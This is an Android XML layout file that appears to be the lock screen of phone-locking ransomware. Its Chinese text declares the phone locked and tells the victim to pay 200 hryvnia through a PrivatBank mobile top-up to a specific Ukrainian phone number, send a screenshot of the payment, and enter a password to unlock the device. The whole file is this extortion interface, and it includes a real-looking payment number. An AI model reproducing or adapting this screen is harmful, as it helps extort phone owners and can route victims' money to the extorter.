<LinearLayout
	xmlns:android="http://schemas.android.com/apk/res/android"
	xmlns:app="http://schemas.android.com/apk/res-auto"
	xmlns:tools="http://schemas.android.com/tools"
	android:layout_width="match_parent"
	android:layout_height="match_parent"
	android:orientation="vertical">
	<LinearLayout
		android:id="@+id/linear1"
		android:layout_width="wrap_content"
		android:layout_height="match_parent"
		android:padding="8dp"
		android:background="#000000"
		android:orientation="vertical">
		<TextView
			android:id="@+id/textview1"
			android:layout_width="wrap_content"
			android:layout_height="wrap_content"
			android:padding="8dp"
			android:text="手机已锁定"
			android:textSize="20sp"
			android:textColor="#F44336"
			android:translationX="70.0dp"
			android:translationY="150.0dp" />
		<TextView
			android:id="@+id/textview2"
			android:layout_width="wrap_content"
			android:layout_height="wrap_content"
			android:padding="8dp"
			android:text="登录PrivatBank，找到移动互联网充值部分，填写卡详细信息，输入电话号码+380991206337，输入金额200格里夫纳，点击支付，截图，找到电话号码+380991206337，发送截图等待答案\n在另一部智能手机上执行此操作。"
			android:textSize="14sp"
			android:textColor="#FFEB3B"
			android:translationY="150.0dp" />
		<EditText
			android:id="@+id/edittext1"
			android:layout_width="match_parent"
			android:layout_height="wrap_content"
			android:padding="8dp"
			android:textSize="12sp"
			android:textColor="#FF9800"
			android:hint="输入密码"
			android:textColorHint="#607D8B"
			android:translationY="150.0dp" />
		<Button
			android:id="@+id/button1"
			android:layout_width="wrap_content"
			android:layout_height="wrap_content"
			android:padding="8dp"
			android:text="解锁智能手机"
			android:textSize="20sp"
			android:textColor="#FFEB3B"
			android:translationX="70.0dp"
			android:translationY="150.0dp" />
	</LinearLayout>
</LinearLayout>